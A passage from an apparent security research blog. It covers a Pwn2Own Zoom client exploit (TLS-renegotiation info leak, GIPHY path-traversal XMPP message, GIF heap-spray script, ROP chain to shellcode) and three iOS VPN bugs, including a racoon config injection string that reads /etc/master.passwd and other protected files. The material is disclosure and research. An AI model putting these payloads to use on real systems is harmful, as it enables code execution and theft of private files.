    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;
} TLS1_PRF_PKEY_CTX;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
{
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;
    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);
    OPENSSL_free(kctx);
}

This means that we could leak the pointer we wanted, but to do so we needed to place three blocks in the right order in a bucket: the block we overflow, the query part of a URL for an HTTPS request we initiated, and a deallocated TLS1_PRF_PKEY_CTX object. One common way of defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it is not that simple in this case: we needed enough objects and overflows to have a chance of success, but not so many that no deallocated TLS1_PRF_PKEY_CTX objects would remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and causes a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotiation, and even renegotiating thousands of times without ever sending an HTTP response is entirely fine. We ended up creating 3 connections to a webserver that did nothing other than constantly renegotiate. This gave us a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.
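
Such a renegotiation-only server could look roughly like this sketch using pyOpenSSL (Python's built-in ssl module cannot initiate renegotiation; certificate paths are placeholders and error handling is omitted):

import socket
from OpenSSL import SSL

ctx = SSL.Context(SSL.TLSv1_2_METHOD)  # renegotiation no longer exists in TLS 1.3
ctx.use_certificate_file("cert.pem")   # hypothetical paths
ctx.use_privatekey_file("key.pem")

srv = socket.create_server(("0.0.0.0", 443))
raw, _ = srv.accept()
conn = SSL.Connection(ctx, raw)
conn.set_accept_state()
conn.do_handshake()

while True:
    conn.renegotiate()   # ask the client for a new handshake...
    conn.do_handshake()  # ...each one allocates and frees a TLS1_PRF_PKEY_CTX in the client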

The info leak did, however, remain the most unstable part of our exploit. If you watch the video of our exploit, the longest delay is waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom; only then would the destructor call some vtable functions.

class FileWrapperImpl : public FileWrapper {
 public:
  FileWrapperImpl();
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

 private:
  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];
};

Code execution at exit was far from ideal: it would mean we had just one shot in each attempt. If we failed to overwrite a vtable, we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, and even if we had, the chance that the exit would complete successfully was small: the information leak would have corrupted many objects and heap metadata in the previous phase, which might not matter while those objects remained unused, but exiting could cause a crash due to destructors or frees.

Based on the WebRTC source code, we noticed that FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There had been no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested adding one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With an emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing complete a couple of full loops at the moment it exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?

Step 12: GIPHY time

We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.


To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for a GIPHY, but using path traversal to point it to a user-uploaded GIF file instead, we found that we could force the downloading of arbitrarily sized GIF files. If the file is a valid GIF file, it is loaded into memory. If we send the same link again, it is not downloaded twice, but a new copy is allocated in memory. This is the second low-impact vulnerability we used, which has also been fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue?id=1::hA-lI2ZGxBzgJczWbR4yPQ::ZxQquub32hKf5Tle_fRKGQ::TnskidmcXKrAUhyi4UP_QGp2qGXkApB2u9xEFRp5RHsZu1F6EL1zd-6mAaU7Cm0TiPQnALOnk1-ggJhnbL_S4czgttgdHVRKHP015TcbRo92RVCI351AO8caIsVYyEW5zpoTSmwsoR8t5E6gv4Wbmjx263lTi1aWl62KifvJ_LDECBM1" size="4322534"/>
  </giphyv2>
</message>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue/../../../file/[file_id]" size="4322534"/>
  </giphyv2>
</message>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.
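
A minimal sketch of how such a spray file could be constructed (the GIF header is a hypothetical minimum and Zoom's actual GIF parser may demand more structure; the in-page offset shown is taken from the ROP listing below):

import struct

PAGE = 0x1000
gif = b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x00\x00\x00"  # minimal header/screen descriptor

page = bytearray(PAGE)
page[:len(gif)] = gif
# place strings and fake pointers at fixed in-page offsets; every copy of the
# page is page-aligned, so any page-aligned guess into the spray sees the same layout
page[0x6c:0x6c + 26] = "kernel32.dll\0".encode("utf-16-le")   # offset 0x6c, as in the ROP stack
payload = bytes(page) * (25 * 1024 * 1024 // PAGE)            # ~25 MB of repeated pages
open("spray.gif", "wb").write(payload)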

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not do anything with the stack just yet. To get there we used what is known as a stack pivot: we replaced the stack pointer with an address pointing to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 
ret

This sequence is misaligned and normally does something else, but for us it could be used to move an address pointing to data we overwrote (held in edi) into the stack pointer. This means that we replaced the stack with data we wrote using the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

  1. Call GetModuleHandleW to get the base address of kernel32.dll.
  2. Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
  3. Call that address to make the GIF data executable.
  4. Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and how, when Close is called, the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then the ROP chain starts by calling GetModuleHandleW with the string "kernel32.dll" from our GIF file as its argument. Finally, when that function returns, a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
VTABLE,     # pop edi
GIF_BASE + 0x101f4, # pop esi
GIF_BASE + 0x101f4, # pop ebx
KNOWN_MAPPED + 0x20, # pop ebp
JMP_GETMODULEHANDLEW,
POP_EBX,
KERNEL32_STR,

ADD_ESP_24,
PUSH_EAX_STACK,
0x41414141,
POP_RET, # Not used, padding for other objects
0x41414141,
0x41414141,
0x41414141,
JMP_GETPROCADDRESS,
JMP_EAX,
KNOWN_MAPPED + 0x10, # This will be overwritten with the base address of Kernel32.dll
VIRTUALPROTECT_STR,
SHELLCODE,
SHELLCODE & 0xfffff000,
0x1000,
0x40,
SHELLCODE - 8,
]

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting the exploit to an acceptable level of reliability. As we mentioned for the info leak, this phase was very tricky. It took a lot of time to get it to the point of having even a tiny chance of success. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function at the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.

In the second phase we could take more risks: the application did not need to remain stable enough for another phase, and we only needed two adjacent allocations, not a third unallocated block as well. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success within the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.dll in one run and then skip the info leak in the next run (the locations of ASLR-randomized DLLs remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that: the first attempt failed in the first phase.

Conclusion

After we handed in our final exploit, the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run it until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it all worth it in the end.

In total we spent around 1.5 weeks from the start of our research until we found the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all the Windows internals involved.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

iOS VPN support: 3 different bugs

7 October 2020 at 00:00

Since iOS version 8, support has been present for third-party apps to implement Network Extensions. Network Extensions can be a variety of things that can all inspect or modify network traffic in some way, like ad-blockers and VPNs.

For VPNs, there are actually three variants that a Network Extension can implement: a “Personal VPN”, where the app supplies only a configuration for a built-in VPN type (IPsec), or the app can implement the VPN code itself, either as a “Packet Tunnel Provider” or an “App Proxy Provider”. We did not spend any time on the latter two; we only investigated Personal VPNs.

To install a VPN Network Extension, the user needs to approve it. This is a little different from other permission prompts in iOS: the user needs to approve it and then also enter their passcode. This makes sense because a VPN can be very invasive, so users must be aware of the installation. If the user uninstalls the app, then any Personal VPN configurations it added are also automatically removed.

Bug 1: App spoofing

To request the addition of a new VPN configuration, the app sends a request to the nehelper daemon using an NSXPCConnection. NSXPCConnection is a high-level API built on XPC that can be used to call specific Objective-C methods between processes. Arguments that are passed to the method are serialized using NSSecureCoding. The object representing the configuration of a Network Extension is an object of the class NEConfiguration. As can be seen from the following class dump of NEConfiguration, the name (_applicationName) and app bundle identifier (_application) of the app which created the request are included in this object:

@interface NEConfiguration : NSObject <NEConfigurationValidating,
			NEProfilePayloadHandlerDelegate, NSCopying, NSSecureCoding> {
    NEVPN * _VPN;
    NEAOVPN * _alwaysOnVPN;
    NEVPNApp * _appVPN;
    NSString * _application;
    NSString * _applicationIdentifier;
    NSString * _applicationName;
    NEContentFilter * _contentFilter;
    NSString * _externalIdentifier;
    long long  _grade;
    NSUUID * _identifier;
    NSString * _name;
    NEPathController * _pathController;
    NEProfileIngestionPayloadInfo * _payloadInfo;
}

It turns out that the permission prompt used that name instead of the actual name of the app that the user would be familiar with. Because that value is part of an object received from the app, the prompt could present the name of an entirely different app, for example one the user might be more inclined to trust as a VPN provider. Because it is even possible to add newlines in this value, a malicious app could attempt to obfuscate what the prompt is actually asking, for example by making it seem like a prompt about installing a software update (where users would expect to enter their passcode).

It is also possible to change the app bundle identifier to something else. By doing this, the VPN configuration is no longer automatically removed when the user uninstalls the app. Therefore, the configuration persists even when the user thinks they removed it by removing the app.

So, by calling these private methods:

NEVPNManager *manager = [NEVPNManager sharedManager];
...
NEConfiguration *configuration = [manager configuration];

[configuration setApplication:nil];
[configuration setApplicationName:@"New Network Settings for 4G"];

[manager saveToPreferencesWithCompletionHandler:^(NSError *error) {
    ...
}];

This results in the following permission prompt:

And this configuration is not automatically removed when uninstalling the app.

Apple fixed this issue in the iOS 14 update.

Bug 2: Configuration file injection (CVE-2020-9836)

IPsec VPNs are handled on iOS by racoon, an IPsec implementation that is part of the open source project ipsec-tools. Note that the upstream project for this was abandoned in 2014:

Important Note

The development of ipsec-tools has been ABANDONED.

ipsec-tools has security issues, and you should not use it. Please switch to a secure alternative!

Whenever an IPsec VPN is asked to connect, the system generates a new racoon configuration file, places it in /var/run/racoon/ and tells racoon to reload its configuration. This happens no matter where the VPN configuration came from: a manually added VPN, Personal VPN Network Extension app or a VPN configuration from a .mobileconfig profile.

While playing around with the configuration options, we noticed a strange error whenever we included a " character in the “Group name” or “Account Name” values. As it turns out, these values are copied literally to the configuration file without any escaping. Because the string itself was enclosed in quotes, this resulted in a syntax error. By using ";, it was possible to add new racoon configuration options.

Racoon supports many more configuration options than what is available via the UI, a Personal VPN API or a .mobileconfig file. Some of those could have an effect that should not be allowed for an app, even though it may be approved as a Network Extension. If you check the man page, you might notice script as an interesting option. Sadly, this is not included in the build on iOS.

One interesting option that did work was the following:

A"; my_identifier keyid file "/etc/master.passwd

This results in the following line in the configuration file:

	my_identifier keyid_use "A"; my_identifier keyid file "/etc/master.passwd";
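
The mechanism, reconstructed as a hedged sketch (the exact template string used by the configuration generator is an assumption, but the output matches the line above):

group_name = 'A"; my_identifier keyid file "/etc/master.passwd'
print('my_identifier keyid_use "%s";' % group_name)
# -> my_identifier keyid_use "A"; my_identifier keyid file "/etc/master.passwd";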

This second option tells racoon to read its group name from the file /etc/master.passwd, which overrides the previous option. Using this as a group name would cause the contents of /etc/master.passwd to be included in the initial IPsec packet:

Of course, on iOS the /etc/master.passwd file is not sensitive as it is always the same, but there are various system locations that racoon is allowed to read from due to its sandbox configuration:

  • /var/root/Library/
  • /private/etc/
  • /Library/Preferences/

There is, however, an important limitation: the group name is added to the initial handshake message, and this packet is sent over UDP, so the entire packet can be at most 65,535 bytes. The group name value is not truncated, so any file larger than 65,535 bytes (minus the overhead of the rest of the packet and the IP and UDP headers) can not be read.

For example, the following files were often found to be below the limit and may contain sensitive information that would normally not be available to an app:

  • /Library/Preferences/SystemConfiguration/com.apple.wifi.plist
  • /private/var/root/Library/Lockdown/data_ark.plist

By exploiting this issue, a Network Extension app could read files that would normally not be accessible due to the app sandbox. Other potential impact could be accessing Keychain items or deleting files in those directories by changing the pid file location.

Apple initially indicated that they planned to release a fix in iOS 13.5, but we found no changes in that version. Then, they applied a fix in iOS 13.6 beta 2 that attempted to filter out racoon options from these fields, which was easily bypassed by replacing the spaces in the example with tabs. Finally, in the release of iOS 13.6 this was actually fixed. Sadly, due to this back and forth, Apple seems to have forgotten to include it in their changelog, even after multiple reminders.

Bug 3: OOB reads (CVE-2020-9837)

As mentioned, the upstream project for racoon is abandoned and it indicates that it contains known security issues. Apple has patched quite a few vulnerabilities in racoon over the years (in the iOS 5 era one was even used for a jailbreak), but likely because there is no upstream project, these fixes were often incorrect or incomplete. In particular, we noticed that some bounds checks Apple added were off by a small amount.

A common pattern in racoon for parsing packets containing a list of elements is the following: the start of the list is cast to a struct with the same representation as the element header (d), and a variable keeps track of the remaining length of the buffer (tlen). Then a loop is started. Each iteration handles the current element, advances the struct to the next element and decreases the number of remaining bytes by the size of the current element. If that number becomes negative or zero, the loop ends.

For example, ipsec_doi.c:534-772:

/*
 * get ISAKMP data attributes
 */
static int
t2isakmpsa(trns, sa)
	struct isakmp_pl_t *trns;
	struct isakmpsa *sa;
{
	struct isakmp_data *d, *prev;
	int flag, type;
	int error = -1;
	int life_t;
	int keylen = 0;
	vchar_t *val = NULL;
	int len, tlen;
	u_char *p;

	tlen = ntohs(trns->h.len) - sizeof(*trns);
	prev = (struct isakmp_data *)NULL;
	d = (struct isakmp_data *)(trns + 1);

	/* default */
	life_t = OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;
	sa->lifetime = OAKLEY_ATTR_SA_LD_SEC_DEFAULT;
	sa->lifebyte = 0;
	sa->dhgrp = racoon_calloc(1, sizeof(struct dhgroup));
	if (!sa->dhgrp)
		goto err;

	while (tlen > 0) {

		type = ntohs(d->type) & ~ISAKMP_GEN_MASK;
		flag = ntohs(d->type) & ISAKMP_GEN_MASK;

		plog(ASL_LEVEL_DEBUG, 
			"type=%s, flag=0x%04x, lorv=%s\n",
			s_oakley_attr(type), flag,
			s_oakley_attr_v(type, ntohs(d->lorv)));

		/* get variable-sized item */
		switch (type) {
		case OAKLEY_ATTR_GRP_PI:
		case OAKLEY_ATTR_GRP_GEN_ONE:
		case OAKLEY_ATTR_GRP_GEN_TWO:
		case OAKLEY_ATTR_GRP_CURVE_A:
		case OAKLEY_ATTR_GRP_CURVE_B:
		case OAKLEY_ATTR_SA_LD:
		case OAKLEY_ATTR_GRP_ORDER:
			if (flag) {	/*TV*/
				len = 2;
				p = (u_char *)&d->lorv;
			} else {	/*TLV*/
				len = ntohs(d->lorv);
				if (len > tlen) {
					plog(ASL_LEVEL_ERR, 
						 "invalid ISAKMP-SA attr, attr-len %d, overall-len %d\n",
						 len, tlen);
					return -1;
				}
				p = (u_char *)(d + 1);
			}
			val = vmalloc(len);
			if (!val)
				return -1;
			memcpy(val->v, p, len);
			break;

		default:
			break;
		}

		switch (type) {
		case OAKLEY_ATTR_ENC_ALG:
			sa->enctype = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_HASH_ALG:
			sa->hashtype = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_AUTH_METHOD:
			sa->authmethod = ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_GRP_DESC:
			sa->dh_group = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_GRP_TYPE:
		{
			int type = (int)ntohs(d->lorv);
			if (type == OAKLEY_ATTR_GRP_TYPE_MODP)
				sa->dhgrp->type = type;
			else
				return -1;
			break;
		}
		case OAKLEY_ATTR_GRP_PI:
			sa->dhgrp->prime = val;
			break;

		case OAKLEY_ATTR_GRP_GEN_ONE:
			vfree(val);
			if (!flag)
				sa->dhgrp->gen1 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen1 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen1, d + 1, len);
				sa->dhgrp->gen1 = ntohl(sa->dhgrp->gen1);
			}
			break;

		case OAKLEY_ATTR_GRP_GEN_TWO:
			vfree(val);
			if (!flag)
				sa->dhgrp->gen2 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen2 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen2, d + 1, len);
				sa->dhgrp->gen2 = ntohl(sa->dhgrp->gen2);
			}
			break;

		case OAKLEY_ATTR_GRP_CURVE_A:
			sa->dhgrp->curve_a = val;
			break;

		case OAKLEY_ATTR_GRP_CURVE_B:
			sa->dhgrp->curve_b = val;
			break;

		case OAKLEY_ATTR_SA_LD_TYPE:
		{
			int type = (int)ntohs(d->lorv);
			switch (type) {
			case OAKLEY_ATTR_SA_LD_TYPE_SEC:
			case OAKLEY_ATTR_SA_LD_TYPE_KB:
				life_t = type;
				break;
			default:
				life_t = OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;
				break;
			}
			break;
		}
		case OAKLEY_ATTR_SA_LD:
			if (!prev
			 || (ntohs(prev->type) & ~ISAKMP_GEN_MASK) !=
					OAKLEY_ATTR_SA_LD_TYPE) {
				plog(ASL_LEVEL_ERR, 
				    "life duration must follow ltype\n");
				break;
			}

			switch (life_t) {
			case IPSECDOI_ATTR_SA_LD_TYPE_SEC:
				sa->lifetime = ipsecdoi_set_ld(val);
				vfree(val);
				if (sa->lifetime == 0) {
					plog(ASL_LEVEL_ERR, 
						"invalid life duration.\n");
					goto err;
				}
				break;
			case IPSECDOI_ATTR_SA_LD_TYPE_KB:
				sa->lifebyte = ipsecdoi_set_ld(val);
				vfree(val);
				if (sa->lifebyte == 0) {
					plog(ASL_LEVEL_ERR, 
						"invalid life duration.\n");
					goto err;
				}
				break;
			default:
				vfree(val);
				plog(ASL_LEVEL_ERR, 
					"invalid life type: %d\n", life_t);
				goto err;
			}
			break;

		case OAKLEY_ATTR_KEY_LEN:
		{
			int len = ntohs(d->lorv);
			if (len % 8 != 0) {
				plog(ASL_LEVEL_ERR, 
					"keylen %d: not multiple of 8\n",
					len);
				goto err;
			}
			sa->encklen = (u_int16_t)len;
			keylen++;
			break;
		}
		case OAKLEY_ATTR_PRF:
		case OAKLEY_ATTR_FIELD_SIZE:
			/* unsupported */
			break;

		case OAKLEY_ATTR_GRP_ORDER:
			sa->dhgrp->order = val;
			break;

		default:
			break;
		}

		prev = d;
		if (flag) {
			tlen -= sizeof(*d);
			d = (struct isakmp_data *)((char *)d + sizeof(*d));
		} else {
			tlen -= (sizeof(*d) + ntohs(d->lorv));
			d = (struct isakmp_data *)((char *)d + sizeof(*d) + ntohs(d->lorv));
		}
	}

	/* key length must not be specified on some algorithms */
	if (keylen) {
		if (sa->enctype == OAKLEY_ATTR_ENC_ALG_DES
		 || sa->enctype == OAKLEY_ATTR_ENC_ALG_3DES) {
			plog(ASL_LEVEL_ERR, 
				"keylen must not be specified "
				"for encryption algorithm %d\n",
				sa->enctype);
			return -1;
		}
	}

	return 0;
err:
	return error;
}

In 9 places in the code, this pattern was used without a check at the start of the loop body that the remainder of the list contained at least as many bytes as the element header is long, nor was there a check that exactly 0 bytes remained after parsing. This means that for the last iteration of the loop, the struct may contain fields that are filled with data past the end of the buffer.
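
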